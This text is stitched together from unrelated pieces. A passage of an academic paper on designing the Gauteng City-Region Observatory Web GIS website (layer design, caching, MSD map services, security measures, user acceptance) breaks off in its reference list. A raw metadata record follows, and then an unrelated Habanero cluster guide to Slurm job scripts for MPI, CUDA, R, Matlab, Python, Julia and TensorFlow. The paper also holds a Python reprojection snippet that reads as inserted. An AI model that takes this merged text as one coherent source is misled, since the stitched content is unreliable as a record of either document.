These users are responsible for planning the future development and direction of the GCR and are mainly high ranking government officials with no mapping or GIS experience. Hence the need for a simple “Google Maps-like” Web GIS design. Public access was also a requirement, ensuring open access to information describing the GCR through the Internet to all GCR citizens. Therefore, a freely accessible, simple to use, Internet site was required to provide access to local and provincial government and citizens. A Web 2.0 GIS application specification was compiled for the GCRO GIS website that required the use of the latest Web 2.0 tools such as GIS data mashups (including the use of Google Maps to provide the base mapping data), APIs (Application Programming Interface) and RIAs. 2.2 Step 2: Design maps for the Web application 2.2.1 Separating data into base map and operational layers Good Web GIS map design practice is to divide data into base map layers, which primarily are used as background layers, and operational layers that users interact with to perform decision-making and task-based functions (Agrios, 2009:45; ESRI, 2009c). Operational layers are normally served dynamically, whereas base map layers, that typically do not change or require updating frequently, should be cached. According to ESRI (ESRI, 2009a), “Map caching is a very effective way to make your ArcGIS Server maps run faster. When you create a map cache, the server draws the entire map at several different scales and stores copies of the map images. The server can then distribute these images whenever someone asks for a map”. A disadvantage of cache is that it takes a long time to create and should not be used if features are regularly updated, as this would require a regeneration of the map cache each time a layer is updated. One of the reasons that Google Maps download and display so fast is that they make use of server-side caching (ESRI, 2009a). The Google Maps layers were therefore designated as base map layers within the GCRO GIS website, with the API accessing the Google Maps cache from the Google servers. Figure 2: An example of map cache at different scales (ESRI, 2009a) With regard to the various GCRO GIS layers that had been assembled, the data was divided into various themes to be used to analyse and obtain a better understanding of the GCR. Six themes were identified, with the GCRO administrative layers theme designated as a base map as it provided the GCR administrative base map context and is switched on by default when the application is opened. It was not, however, cached and therefore functions like an operational layer. **Figure 3: GCRO GIS application: base map and operational (dynamic theme) layers (Wray, 2011:56)** The remaining five GCRO themes were designated as operational or dynamic themes (illustrated in Figure 3 above). As ESRI ArcGIS server 9.3.1 Web GIS software was utilised by the GCRO to publish the data, the data were mapped and symbolised in ArcMap (ArcView licence), with each of the five operational themes and GCRO administrative layer theme, created in separate ArcMap map documents. ### 2.2.2 Web GIS mapping compromises Diacono (2009) states that “designing maps for the Web means making compromises”. These include: employing strong cartography, using scale dependency to enhance performance and improve clarity and maintaining coordinate systems for all layers used in the application (Agrios, 2009:44). 
Strong cartography was employed in the GCRO themes by ensuring both the layer symbology and labels were clearly visible on a standard PC (Personal Computer) or laptop screen, and that each layer within a theme was uniquely represented and identifiable with other GCRO theme layers switched on or overlaid on the various Google Maps base maps. The use of Google Maps as base map layers also required that the GCRO themes used the same scales and coordinate system (WGS84 Web Mercator) as Google Maps (ESRI, 2009a). Each of the GCRO theme layers was projected to WGS84 Web Mercator and the Google Maps scale levels applied to the ArcMap documents. Scale dependencies, whereby layers only display at predetermined scales, were applied where possible to some of the GCRO layers to ensure the layers only displayed at an appropriate scale, to avoid unnecessary processing by the server and to improve performance. For example, the Gauteng land use layer in the Spatial Structure theme is not clearly discernible at the Gauteng extent and took a long time to draw at small scales. A scale dependency was set whereby the layer is only visible when a user zooms in beyond a scale of 1: 288 895. 2.3 Step 3: Tune the maps to optimise performance To ensure that the maps that users request are rendered by the server as quickly as possible, it is necessary to tune the maps to optimise performance. 2.3.1 Using the Map Service Publishing toolbar The desktop software (ArcMap version 9.3.1) used to design the Web maps for the GCRO GIS website provides a new tool called the Map Service Publishing toolbar, to analyse the performance of each of the layers in the ArcMap map document. The Analyse map button provides the main functionality as it cycles through each layer and generates a report identifying potential performance bottlenecks and/or errors that must be addressed before a map service is published (Agrios, 2009:46). As visible in Figure 4, a dialog box opens at the bottom of the ArcMap application when the analyse tool is run and contains errors, warnings and messages. These guide the user to: - Identify errors that may prevent the service from being published (which in the case of the .msd file format, must be resolved before saving), - Resolve warnings to ensure optimal performance from the published map service. The preview window tests the draw speed of the layers at different scales and provides the developer with an opportunity to test the effect of changing various settings on draw speeds before implementing the optimal Web map drawing settings. 2.3.2 GIS data formats The format of the GIS data is another factor that may influence performance. ESRI advises that an enterprise ArcSDE geodatabase should be used for large ArcGIS Server system implementations, as ArcSDE provides benefits such as high-availability support, backup and recovery, concurrency, scalability and a tendency to provide superior performance (ESRI, 2009b). However, the performance of map services sourcing data from an ArcSDE geodatabase is dependent on a dedicated database administrator to tune, optimise and maintain the ArcSDE geodatabase. Provided that the published data is relatively static and enterprise capabilities of ArcSDE such as versioning are not required, a file geodatabase offers a good alternative to serve Web GIS data, as it provides good performance with minimal extra configuration (ESRI, 2009b). For this reason, all the vector data accessed by the GCRO GIS application are stored in file geodatabases.
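As noted under Step 2 above, every layer had to be delivered in the same WGS84 Web Mercator projection used by the Google Maps base layers. The GCRO workflow performed this reprojection in ArcMap; purely as an illustration, and as an assumption of this sketch (the pyproj library is not part of the GCRO toolchain), the same conversion can be checked in a few lines of Python:

```python
from pyproj import Transformer

# WGS84 geographic coordinates (EPSG:4326) to Web Mercator (EPSG:3857),
# the projection commonly used by Google Maps base layers.
to_web_mercator = Transformer.from_crs("EPSG:4326", "EPSG:3857", always_xy=True)

# Roughly Johannesburg, near the centre of the Gauteng City-Region.
lon, lat = 28.05, -26.20
x, y = to_web_mercator.transform(lon, lat)
print(f"Web Mercator: x = {x:.1f} m, y = {y:.1f} m")
```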
Various server hardware, network and scalability configurations will also affect the Web map’s performance, but are beyond the scope of this paper. 2.4 Step 4: Publishing the maps as Web services 2.4.1 Map Service Definition (MSD) format According to Agrios (2009:47), depending on how the map will be used and the type of data it contains, a user has the choice of saving the ArcMap documents in one of two formats used to publish the map services: - **MXD**: if the map user’s layers are “not supported by the 9.3.1 optimised rendering engine” (Agrios, 2009:47), for example, dot density symbology, or the published map service uses analysis tasks such as geoprocessing. - **MSD**: if the map service will be served dynamically and only provide mapping, KML (Keyhole Markup Language) or WMS (Web Map Service) capabilities. The MSD (Map Service Definition) format is an optimised version of the standard ArcMap .mxd project document file format specifically designed to enhance the performance of published map services (ESRI, 2009b). Cached maps may provide the best performance for serving GIS data, with less load placed on the server (ESRI, 2009c), but dynamic MSD services provide a good alternative, having the additional advantages such as providing users with the flexibility to toggle the visibility of individual layers and the ability to serve the updated data as soon as the geodatabase is updated (Agrios, 2009:47). None of the GCRO themes could be cached because of the dynamic MXD/MSD functionality that was required in the application (such as dynamically switching on and off individual layers within each theme). However, good response times for rendering the map services were achieved due to the use of the cached Google Maps base layers, and in most cases, only a couple of dynamic GCRO theme layers switched on at any point in time. The result: a vast improvement in server response times and reduced server load compared to earlier GIS website applications using older Web GIS software such as ESRI ArcIMS Web GIS software, which required the server to render all the visible layers. Four of the GCRO themes (GCRO Administrative layers, 2009 Quality of Life, Spatial Structure and Transport) were published as optimised MSD map services using the Publish to ArcGIS Server tool, within the Map Service Publishing toolbar. Two of the themes had to be published as MXDs due to the dynamic cartographic symbology used to visually represent the Census 2001 population and unemployment data as dot density maps, which is not supported in the MSD format. 2.4.2 Securing Web mapping services Securing Web services is an important part of securing a Web application, especially in the case of potentially sensitive government information. Various techniques were implemented to safe guard the GCRO GIS server and Web services, including: - Hosting the GCRO GIS server in a secure data centre that deploys security measures such as IPS (Intrusion Prevention System), which is designed to monitor the network and system activities for malicious activities and attempt to block and report any malicious activity (Wikipedia contributors, 2010). • Role based authentication that was applied to the GCRO GIS Web services to ensure that only authorised users can access the map services through the Web. • A security token that was implemented in the GCRO GIS viewer to allow the GCRO GIS application to access the map services without the need for user names and passwords. 
According to Fu and Sun (2011b:86), further security measures that can be used to secure GIS data published as Web services include: • The use of a private network if the Web service and clients are on a separate private network. • The use of a VPN (Virtual Private Network) to enable secure connections across the Internet. • Implementing HTTPS (Secure Hypertext Transfer Protocol) which encrypts the data transferred between the Web service and client. • Installing a reverse proxy that provides an additional layer of defence by masking the Web server behind the reverse proxy. 2.5 Step 5: Web application development Once the optimised, tuned map services have been published, a Web GIS application is required to serve the GIS data. ESRI provides a range of RIA Web 2.0 software development kits (SDKs) such as Web mapping APIs and application development frameworks to build dynamic applications that access the ArcGIS Server services (ESRI, 2009c). These include: Java, Adobe Flex, Microsoft SharePoint, .NET and Silverlight. The availability of programming skills is the most important factor to consider when deciding which software and APIs to use to develop a GIS website (ESRI, 2009c). The GIS viewer was developed by two student interns from the JCSE (Johannesburg Centre for Software Engineering) based at Wits (JCSE, 2010), who had no prior development experience with any of the ESRI Web APIs. However, as an increasing number of ESRI Adobe Flex websites were being developed and deployed, it was decided to develop using the ESRI Adobe Flex sample viewer. Flex is based on an “open source framework for building expressive Web applications that deploy consistently on all major browsers, desktops, and operating systems by leveraging the Adobe® Flash® Player and Adobe AIR® runtimes” (Adobe, 2010) and deploys across all browsers and operating systems. The basic structure of the GCRO Web GIS application prototype is illustrated in Figure 5 and was developed by customising ESRI Flex sample viewer version 1.3 with the ESRI Flex API version 1.3 and Google Maps API for Flash, to incorporate the GCRO design and functionality detailed in the specification. An advantage of customising the sample viewer is that all the base functionality and tools such as navigation tools, basic searches and drawing tools were already included. Only the additional tools that the GCRO required, such as dynamic themes and graphs, had to be developed. However, a cautionary note is provided by Noyle and Bouwman (2010:42): with the wealth of development tools, developers should consider only including the essential tools from sample viewers and design them to be intuitively obvious to the user. The prototype development was completed by June 2010 when it was presented to the GCRO and GPG Department of Economic Development staff. The response was extremely favourable and the prototype viewer specification was refined to include enhancements and staff suggestions made during the prototype presentation. Version 1.0 of the GCRO GIS website was released and publically launched on 1 September 2010. 3. GCRO GIS website The GCRO GIS website is viewable in all the main Internet browsers (such as Internet Explorer, Safari, Firefox and Google Chrome), but does require a reasonable broadband Internet connection and the Adobe Flash Player plug-in (version 9) to be installed. It is accessed from the GCRO website (www.gcro.ac.za) by selecting the Interactive GIS link. 
The website consists of the mapping window that utilises the full extent of the browser window and the main user interface in the top left corner with the website tools grouped into: base data, dynamic themes, navigation tools (which are also easily accessible on the main interface), website tools and help. Some of the tools and themes pop up on the right hand side of the viewer when selected. Figure 6: GCRO GIS website (Wray, 2011:76) Users interact with the data by selecting the appropriate Google Maps base layer and then overlaying the various GCRO GIS layers from each of the GCRO themes. Two different search tools are available. The first is a Google search which utilises the power of the Google Maps search engine and allows the user to search for a point of interest, street address or any other feature stored in the Google Maps database. The GCRO search provides for searches on specific GCRO layers such as local municipalities or wards. There is also an identify, draw and printing tool, which allows the user to choose a base layer and print to an A4 landscape or pdf file. Finally, a comprehensive help page is provided that explains each tool in detail. An example of dynamic Web 2.0 RIA functionality is provided in Figure 7, which depicts the visualisation of the 2009 Quality of Life survey, with the satisfaction with local government layer displayed on the map and dissatisfaction with government drawn in the graph. Figure 7: 2009 Quality of Life dynamic theme with graph (Wray, 2011:80) The Technology Acceptance Model (TAM), the most widely employed model of IT adoption and use (Venkatesh and Bala, 2008:274), was used to determine the success of the GCRO g-government website by measuring user acceptance at the prototype and implementation stages of the project. High user acceptance scores were achieved for perceived usefulness, perceived ease of use and data quality across both professional technical and non-GIS management staff (Wray, 2011:87). An average score of 6.82 out of a maximum of 7.00 for behavioural intention to use indicates the intention of the questionnaire respondents to utilise the GCRO GIS website, and that the Web GIS design met the needs of its intended users (Wray, 2011:87). 4. Conclusion Web 2.0 technologies such as the Google Maps mashups and the RIA tools available in the ESRI Flex sample viewer have been successfully combined with the dynamic maps and graphs of the GCRO government datasets to provide a g-government website for the GCR. The GCRO GIS website offers comprehensive base data and thematic layers covering the GCR, and is fast and easy to use, with a fun element of RIA popup windows and dynamic graphs. A five step Web 2.0 GIS website design methodology was utilised to guide the entire project and ensure an optimal functioning application with responsive and secure map services, by applying various Web mapping optimisation techniques. These include: - Designing the maps for a Web application by separating the data into base maps and operational layers. - Making Web mapping compromises such as setting scale dependencies and using common coordinate systems for all data mashup layers. - Serving cached or optimised MSD Web services. - Tuning the maps for optimal map service performance. As more online data sources and mapping applications become available, developers should take note of Web GIS design and optimisation techniques (such as the design methodology discussed in this paper) to be applied to Web applications containing GIS data. 5.
List of references Hughes, H., Macmillan, P. and Medd, A. 2008. Change your world or the world will change you: The future of collaborative government and Web 2.0. Available
{"Source-Url": "https://ujcontent.uj.ac.za/vital/access/services/Download/uj:6057/CONTENT1", "len_cl100k_base": 5858, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 38708, "total-output-tokens": 7873, "length": "2e12", "weborganizer": {"__label__adult": 0.00034236907958984375, "__label__art_design": 0.0011167526245117188, "__label__crime_law": 0.0008025169372558594, "__label__education_jobs": 0.002838134765625, "__label__entertainment": 0.0001392364501953125, "__label__fashion_beauty": 0.0001933574676513672, "__label__finance_business": 0.0009794235229492188, "__label__food_dining": 0.0003399848937988281, "__label__games": 0.0006604194641113281, "__label__hardware": 0.0019702911376953125, "__label__health": 0.0003960132598876953, "__label__history": 0.00298309326171875, "__label__home_hobbies": 0.00012385845184326172, "__label__industrial": 0.0005655288696289062, "__label__literature": 0.0003502368927001953, "__label__politics": 0.00131988525390625, "__label__religion": 0.0004086494445800781, "__label__science_tech": 0.1597900390625, "__label__social_life": 0.0001589059829711914, "__label__software": 0.12060546875, "__label__software_dev": 0.7021484375, "__label__sports_fitness": 0.00019109249114990232, "__label__transportation": 0.0009927749633789062, "__label__travel": 0.0005903244018554688}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31964, 0.03827]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31964, 0.52096]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31964, 0.89743]], "google_gemma-3-12b-it_contains_pii": [[0, 2382, false], [2382, 5916, null], [5916, 8923, null], [8923, 10741, null], [10741, 12686, null], [12686, 14533, null], [14533, 16541, null], [16541, 17650, null], [17650, 20666, null], [20666, 22871, null], [22871, 24107, null], [24107, 25819, null], [25819, 27172, null], [27172, 29854, null], [29854, 31964, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2382, true], [2382, 5916, null], [5916, 8923, null], [8923, 10741, null], [10741, 12686, null], [12686, 14533, null], [14533, 16541, null], [16541, 17650, null], [17650, 20666, null], [20666, 22871, null], [22871, 24107, null], [24107, 25819, null], [25819, 27172, null], [27172, 29854, null], [29854, 31964, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31964, null]], "pdf_page_numbers": [[0, 2382, 1], [2382, 5916, 2], [5916, 8923, 3], [8923, 10741, 4], [10741, 12686, 5], [12686, 14533, 6], [14533, 16541, 7], [16541, 17650, 8], [17650, 20666, 9], [20666, 22871, 10], [22871, 24107, 11], [24107, 25819, 
12], [25819, 27172, 13], [27172, 29854, 14], [29854, 31964, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31964, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
c9e861b5d2565f6603dc280d495b9c3a65bd9474
Habanero - Job Examples - Hello World - C/C++/Fortran - C/C++/Fortran MPI - GPU (CUDA C/C++) - Example of R run - Installing R Packages on Habanero - Local Installation - Matlab - Python and JULIA - Tensorflow - Jupyter Notebooks In order for the scripts in these examples to work, you will need to replace <ACCOUNT> with your group's account name. Hello World This script will print "Hello World", sleep for 10 seconds, and then print the time and date. The output will be written to a file in your current directory. ```bash #!/bin/sh # # Simple "Hello World" submit script for Slurm. # # Replace <ACCOUNT> with your account name before submitting. #SBATCH --account=<ACCOUNT> # The account name for the job. #SBATCH --job-name=HelloWorld # The job name. #SBATCH -c 1 # The number of cpu cores to use. #SBATCH --time=1:00 # The time the job will take to run. #SBATCH --mem-per-cpu=1gb # The memory the job will use per cpu core. echo "Hello World" sleep 10 date # End of script ``` C/C++/Fortran To submit a precompiled binary to run on Habanero, the script will look just as it does in the Hello World example. The difference is that you will call your executable file instead of the shell commands "echo", "sleep", and "date". C/C++/Fortran MPI Intel Parallel Studio Habanero supports Intel Parallel Studio which provides a version of MPI derived from MPICH2. We encourage users to avail themselves of Intel MPI because it is faster and more modern than other versions. Also, all nodes on the cluster have Infiniband transport and that is the fabric that MPI jobs avail themselves of - which is another reason for a substantial boost of efficiency on the cluster. To use Intel MPI, you must load the Intel module first: module load intel-parallel-studio/2017 mpiexec ./myprogram In order to take advantage of Habanero architecture, your program should be (re)compiled on the cluster even if you used Intel for compiling it on another cluster (like Yeti). It is important to compile with the compiler provided by the module mentioned above. Note that you may have to set additional environment variables in order to successfully compile your program. These are the locations of the C and Fortran compilers for Intel Studio: $ module load intel-parallel-studio/2017 (...) $ which mpiicc /rigel/opt/parallel_studio_xe_2017/compilers_and_libraries_2017.0.098/linux/mpi/intel64/bin/mpiicc $ which ifort /rigel/opt/parallel_studio_xe_2017/compilers_and_libraries_2017.0.098/linux/bin/intel64/ifort For programs written in C, use mpiicc in order to compile them: $ mpiicc -o <MPI_OUTFILE> <MPI_INFILE.c> The submit script below, named pi_mpi.sh, assumes that you have compiled a simple MPI program used to compute pi, (see mpi_test.c), and created a binary called pi_mpi: #!/bin/sh #SBATCH -A <ACCOUNT> #SBATCH --time=30 #SBATCH -N 2 #SBATCH --exclusive module load intel-parallel-studio/2017 mpiexec -bootstrap slurm ./pi_mpi # End of script The --exclusive flag will ensure that full nodes are being used in the runs (that's the reason why no memory specification is given). Each available core will give rise to another MPI thread. Without the flag, you can specify the number of tasks, or tasks per node, in order to limit the number of threads that will be created. For example, you can replace the directive containing the flag by: #SBATCH -N 2 #SBATCH --ntasks-per-node=4 - and your MPI code will run on 8 threads, with 4 on each of the 2 nodes requested. 
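The mpi_test.c source referenced above is only linked from this page, not reproduced here. As a rough illustration, the following is a minimal, hypothetical MPI pi-estimation program in C; the file layout, the number of integration intervals, and the midpoint-rule integration are assumptions, not the course-provided code.

```c
/* mpi_test.c -- hypothetical sketch of an MPI program that estimates pi.
 * Compile on Habanero with:  mpiicc -o pi_mpi mpi_test.c   (Intel MPI)
 *                     or:    mpicc  -o pi_mpi mpi_test.c   (OpenMPI)
 */
#include <mpi.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
    const long n = 100000000;          /* number of integration intervals */
    int rank, size;
    long i;
    double local = 0.0, pi = 0.0, h;

    MPI_Init(&argc, &argv);
    MPI_Comm_rank(MPI_COMM_WORLD, &rank);
    MPI_Comm_size(MPI_COMM_WORLD, &size);

    /* Each rank integrates 4/(1+x^2) over its share of [0,1]. */
    h = 1.0 / (double)n;
    for (i = rank; i < n; i += size) {
        double x = h * ((double)i + 0.5);
        local += 4.0 / (1.0 + x * x);
    }
    local *= h;

    /* Combine the partial sums on rank 0 and print the result. */
    MPI_Reduce(&local, &pi, 1, MPI_DOUBLE, MPI_SUM, 0, MPI_COMM_WORLD);
    if (rank == 0)
        printf("pi is approximately %.16f\n", pi);

    MPI_Finalize();
    return 0;
}
```

Compiled as described above, the resulting pi_mpi binary is what pi_mpi.sh launches with mpiexec.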
**Job Submission**

```
$ sbatch pi_mpi.sh
```

**OpenMPI**

Habanero also supports OpenMPI from the GNU family. To use OpenMPI, load the following module instead:

```
module load openmpi/gcc/64
mpiexec myprogram
```

Your program must be compiled on the cluster. You can use the module command as explained above to set your path so that the corresponding *mpicc* will be found. Note that you may have to set additional environment variables in order to successfully compile your program.

```
$ module load openmpi/gcc/64
$ which mpicc
/rigel/opt/openmpi-2.0.1/bin/mpicc
```

Compile your program using *mpicc*. For programs written in C:

```
$ mpicc -o <MPI_OUTFILE> <MPI_INFILE.c>
```

**GPU (CUDA C/C++)**

The cluster includes two types of GPU servers: Nvidia K80s and Nvidia P100s.

- There are 14 K80 GPU servers, each with two dual K80 Tesla GPU accelerators, for a total of 4 GPU modules per server.
- There are 13 P100 servers, each with two P100 accelerators, for a total of 2 GPU modules per P100 server.

To use a GPU server you must specify the *--gres=gpu* option in your submit request, followed by a colon and the number of GPU modules you require (with a maximum of 4 per server for K80s and 2 per server for P100s).

Use the *--constraint=k80* or *--constraint=p100* directive if you'd like to request a specific type of GPU. To request a **K80** GPU, add `#SBATCH --constraint=k80` to your submit script; to request a **P100** GPU, specify this in your submit script:

```
#SBATCH --constraint=p100
```

Not all applications have GPU support, but some, such as MATLAB, have built-in GPU support and can be configured to use GPUs.

To build your CUDA code and run it on the GPU modules, you must first set your paths so that the Nvidia compiler can be found. Please note you must be logged into a GPU node to access these commands. To log in interactively to a GPU node, run the following command, replacing `<ACCOUNT>` with your account:

```
$ srun --pty -t 0-01:00 --gres=gpu:1 -A <ACCOUNT> /bin/bash
```

Load a suitable gcc module first. Note that CUDA 8.0 does not support gcc 6, so gcc 5 or earlier must be accessible in your environment when running nvcc.

```
$ module load gcc/4.8.5
```

Load the cuda environment module, which will add cuda to your PATH and set related environment variables.

```
$ module load cuda80/toolkit
```

You then compile your program using `nvcc`:

```
$ nvcc -o <EXECUTABLE_NAME> <FILE_NAME.cu>
```

For example, the `hello_world.cu` sample code (a hypothetical sketch of such a file is shown below, after the submit script) can be built with the following command:

```
$ nvcc -o hello_world hello_world.cu
```

For non-trivial code samples, refer to Nvidia's [CUDA Toolkit Documentation](https://docs.nvidia.com/cuda/index.html).

A Slurm script template, `gpu.sh`, that can be used to submit this job is shown below:

```
#!/bin/sh
#SBATCH --account=<ACCOUNT>    # The account name for the job.
#SBATCH --job-name=HelloWorld  # The job name.
#SBATCH --gres=gpu:1           # Request 1 gpu (up to 4 on K80s, or up to 2 on P100s, are valid).
#SBATCH -c 1                   # The number of cpu cores to use.
#SBATCH --time=1:00            # The time the job will take to run.
#SBATCH --mem-per-cpu=1gb      # The memory the job will use per cpu core.

module load cuda80/toolkit
./hello_world
# End of script
```

Job submission:

```
$ sbatch gpu.sh
```

This program will print "Hello World!!" when run on a GPU server, or "Hello Hello" when no GPU module is found.
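The hello_world.cu sample itself is only linked from this page. As a rough, hypothetical sketch of a program with the behavior described above (printing "Hello World!!" on a GPU node and falling back to "Hello Hello" when no GPU is available), something like the following CUDA C file could be used; the kernel logic and buffer layout are assumptions, not the original sample.

```c
// hello_world.cu -- hypothetical sketch, built with: nvcc -o hello_world hello_world.cu
#include <stdio.h>
#include <cuda_runtime.h>

// Device kernel: overwrite the second word of the buffer with "World!!".
__global__ void hello_kernel(char *buf)
{
    const char msg[] = "World!!";
    for (int i = 0; i < 7; i++)
        buf[6 + i] = msg[i];
}

int main(void)
{
    char host[16] = "Hello Hello";   // printed unchanged if no GPU is found
    char *dev = NULL;

    // If a GPU is present, run the kernel and copy the result back.
    if (cudaMalloc((void **)&dev, sizeof(host)) == cudaSuccess) {
        cudaMemcpy(dev, host, sizeof(host), cudaMemcpyHostToDevice);
        hello_kernel<<<1, 1>>>(dev);
        cudaMemcpy(host, dev, sizeof(host), cudaMemcpyDeviceToHost);
        cudaFree(dev);
    }
    printf("%s\n", host);            // "Hello World!!" on a GPU node
    return 0;
}
```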
**Example of R run**

For this example, the R code below is used to generate a graph "Rplot.pdf" of a discrete Delta-hedging of a call. It hedges along a path and repeats over many paths. There are two R files required:

```
hedge.R
BlackScholesFormula.R
```

A Slurm script, hedge.sh, that can be used to submit this job is presented below.

Batch queue submission:

```
$ sbatch hedge.sh
```

This program will leave several files in the output directory: slurm-<jobid>.out, Rplots.pdf, and routput (the first one will be empty).

**Installing R Packages on Habanero**

HPC users have two options for R packages:

1. Install packages locally in your user space that can be called by your programs (faster, see below).
2. E-mail hpc-support@columbia.edu and request a package to be installed on all HPC nodes (slower).

**Local Installation**

After logging in to Habanero, start R:

```
$ module load R
$ R
```

You can see the default library paths (where R looks for packages) by calling .libPaths(). These paths are all read-only, so you cannot install packages to them. To fix this, we will tell R to look in additional places for packages.

Exit R and create a directory rpackages in /rigel/<GROUP>/users/<UNI>/:

```
$ mkdir /rigel/<GROUP>/users/<UNI>/rpackages
```

Go back into R and add this path to .libPaths():

```
$ R
> .libPaths("/rigel/<GROUP>/users/<UNI>/rpackages/")
```

Call .libPaths() to make sure the path has been added:

```
> .libPaths()
[1] "/rigel/<GROUP>/users/<UNI>/rpackages/"
[2] "/usr/lib64/R/site-library"
[3] "/usr/lib64/R/library"
```

To install a package, such as the "sm" package, tell R to put the package in your newly created local library:

```
> install.packages("sm", lib="/rigel/<GROUP>/users/<UNI>/rpackages")
```

Select an appropriate mirror and follow the install instructions. Test to see if the package can be called:

```
> library(sm)
Package 'sm', version 2.2-3; Copyright (C) 1997, 2000, 2005, 2007 A.W.Bowman & A.Azzalini
help(sm) for summary information
```

In order to access this library from your programs, make sure you add the following line to the top of every program:

```
.libPaths("/rigel/<GROUP>/users/<UNI>/rpackages/")
```

Since R will then know where to look for libraries, a call to library(sm) will be successful (however, this line is not necessary per se for the install.packages(...) call, as the directory is already specified in it).

**Matlab**

Matlab (single thread)

The file linked below is a Matlab M-file containing a single function, simPoissGLM, that takes one argument (lambda).

```
simPoissGLM.m
```

A Slurm script, simpoiss.sh, that can be used to submit this job is presented below (implicitly, --cpus-per-task=1).

```
#!/bin/sh
#
# Simple Matlab submit script for Slurm.
#
#SBATCH -A astro               # The account name for the job.
#SBATCH -J SimpleMLJob         # The job name.
#SBATCH -t 1:00                # The time the job will take to run.
#SBATCH --mem-per-cpu=1gb      # The memory the job will use per cpu core.

module load matlab
echo "Launching a Matlab run"
date

#define parameter lambda
LAMBDA=10

#Command to execute Matlab code
matlab -nosplash -nodisplay -nodesktop -r "simPoissGLM($LAMBDA)" # > matoutfile

# End of script
```

Batch queue submission:

```
$ sbatch simpoiss.sh
```

This program will leave several files in the output directory: slurm-<jobid>.out, out.mat, and matoutfile.

Matlab (multi-threading)

Matlab has built-in implicit multi-threading (even without its Parallel Computing Toolbox, PCT), which causes it to use several cores on the node it is running on. It consumes the number of cores assigned by Slurm. The user can also activate explicit (PCT) multi-threading by specifying the number of cores desired in the Matlab program.
The Slurm submit script (simpoiss.sh) should then contain the following line:

```
#SBATCH -c 6
```

The -c flag determines the number of cores (up to 24 are allowed). For explicit multi-threading, users must include the following corresponding statement within their Matlab program:

```
parpool('local', 6)
```

The second argument passed to parpool must equal the number of cores specified with the -c directive. Users who are acquainted with commands like parfor need to specify explicit multi-threading with the help of the parpool command above.

Note: maxNumCompThreads() is being deprecated by Mathworks. It is being replaced by parpool.

The command to execute Matlab code remains unchanged from the single-thread example above.

Important note: On Yeti, where Matlab was single thread by default, it appeared that more recent versions of Matlab took the liberty of grabbing all cores within a node even when fewer (or even only one) cores were specified as above. On Habanero, we believe this has been addressed by implementing a system mechanism which enforces the proper usage of the number of specified cores.

**Python and Julia**

To use Python you need to run:

```bash
$ module load anaconda
```

Here's a simple Python program called "example.py" – it has just one line:

```python
print("Hello, World!")
```

To submit it on the Habanero cluster, use the submit script "example.sh":

```bash
#!/bin/sh
#
# Simple "Hello World" submit script for Slurm.
#
#SBATCH --account=astro        # The account name for the job.
#SBATCH --job-name=HelloWorld  # The job name.
#SBATCH -c 1                   # The number of cpu cores to use.
#SBATCH --time=1:00            # The time the job will take to run.
#SBATCH --mem-per-cpu=1gb      # The memory the job will use per cpu core.

module load anaconda

#Command to execute Python program
python example.py

#End of script
```

If you use the "ls" command you should see the 2 files:

```
example.sh example.py
```

To submit the job, use:

```bash
$ sbatch example.sh
```

To check the output, use:

```bash
$ cat slurm-463023.out
Hello, World!
```

Similarly, here is "julia_example.jl" with just one line:

```bash
$ cat julia_example.jl
println("hello world")
```

and

```bash
$ cat julia_example.sh
```

```
#!/bin/sh
#
# Simple "Hello World" submit script for Slurm.
#
#SBATCH --account=hblab        # The account name for the job.
#SBATCH --job-name=HelloWorld  # The job name.
#SBATCH -c 1                   # The number of cpu cores to use.
#SBATCH --time=1:00            # The time the job will take to run.
#SBATCH --mem-per-cpu=1gb      # The memory the job will use per cpu core.

module load julia

#Command to execute Julia program
julia julia_example.jl

#End of script
```

After you finish creating those two files, the "ls" command should show:

```
julia_example.jl julia_example.sh
```

To submit the job, use:

```
$ sbatch julia_example.sh
Submitted batch job 463030
```

To check the output:

```
$ cat slurm-463030.out
hello world
```

**Julia Interactive Session Usage:**

**Step 1 >> start an interactive session** (use "astro" if you are a member of the "astro" group, otherwise use your group name):

```
$ srun --pty -t 0-04:00 -A astro /bin/bash
$ module load julia/0.5.1
$ julia julia_example.jl
hello world
$ julia
```
Julia then prints its startup banner (reporting Version 0.5.1 (2017-03-05), the official http://julialang.org/ release for x86_64-pc-linux-gnu) followed by the julia> prompt. To quit Julia, use "CTRL + D".

**Tensorflow**

This is how you can import TensorFlow on a GPU node (use "astro" if you are a member of the "astro" group, otherwise use your group name).

First request a GPU node on Habanero:

```
$ srun --pty -t 0-02:00:00 --gres=gpu:1 -A astro /bin/bash
```

Load these modules:

```
$ module load cuda80/toolkit cuda80/blas cudnn/6.0_8
$ module load anaconda/2-4.2.0
```

Install tensorflow-gpu as a user (this can take a few minutes, please wait - you need to do it only once):

```
$ pip install tensorflow-gpu --user
```

Start Python and test TensorFlow:

```
$ python
Python 2.7.12 |Anaconda 4.2.0 (64-bit)| (default, Jul 2 2016, 17:42:40)
>>> import tensorflow as tf
I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcublas.so.8.0 locally
